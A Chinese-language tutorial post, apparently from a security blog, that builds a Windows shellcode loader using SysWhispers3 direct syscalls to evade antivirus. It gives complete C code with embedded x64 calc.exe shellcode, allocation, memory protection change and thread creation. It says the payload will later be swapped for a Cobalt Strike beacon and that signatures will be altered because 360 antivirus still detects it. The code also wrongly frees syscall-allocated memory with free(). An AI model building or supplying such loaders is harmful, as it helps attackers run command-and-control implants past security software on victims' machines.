首先使用github提供的项目https://github.com/klezVirus/SysWhispers3
利用该工具去执行命令
python3 syswhispers.py --functions NtCreateThreadEx,NtProtectVirtualMemory,NtAllocateVirtualMemory -o syscalls_mem --arch x64 --wow64
然后会产生三个文件
然后我们将它放到vs studio中,如下:
我们分开来看
ConsoleApplication3.c:(该payload是弹出计算器,还需要后续去改成上线cs)
#define _CRT_SECURE_NO_WARNINGS 1
#include "syscalls_mem.h"
#include <Windows.h>
#include<stdio.h>
unsigned char calc_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
unsigned int calc_len = 276;
int main()
{
DWORD oldprotect = 0;
HANDLE hProc = GetCurrentProcess();
LPVOID base_addr = NULL;
HANDLE thandle = NULL;
NTSTATUS NTAVM = NtAllocateVirtualMemory(
hProc,
&base_addr,
0,
(PSIZE_T)&calc_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
RtlMoveMemory(base_addr, calc_payload, calc_len);
NTSTATUS NTPVM = NtProtectVirtualMemory(
hProc,
&base_addr,
(PSIZE_T)&calc_len,
PAGE_EXECUTE_READ,
&oldprotect);
NTSTATUS ct = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, FALSE, 0, 0, 0, NULL);
if (ct == 0)
{
printf("[*] -- shellcode start succesful!");
free(base_addr);
return 0;
}
printf("[*] -- shellcode start error!");
free(base_addr);
return 1;
}
因为这个文件要生成,所以不需要做下面的改动
其他三个都是自动生成的,位置放好相应路径即可
因为syscalls_mem.c是需要去编译的,所以我们也默认它的属性值,和ConsoleApplication3.c一样:
syscalls_mem.h也是需要编译的,也是默认的
只有.asm是不需要生成的,修改如下:
同时需要项目导入masm依赖
然后编译即可
运行看看效果:
可以看到成功弹出计算器
然后我放到360杀毒中,会报毒
应该是检测到了syscall
因为syscall特征非常明显,静态特征就很容易被识别到
那么之后再次特征上修改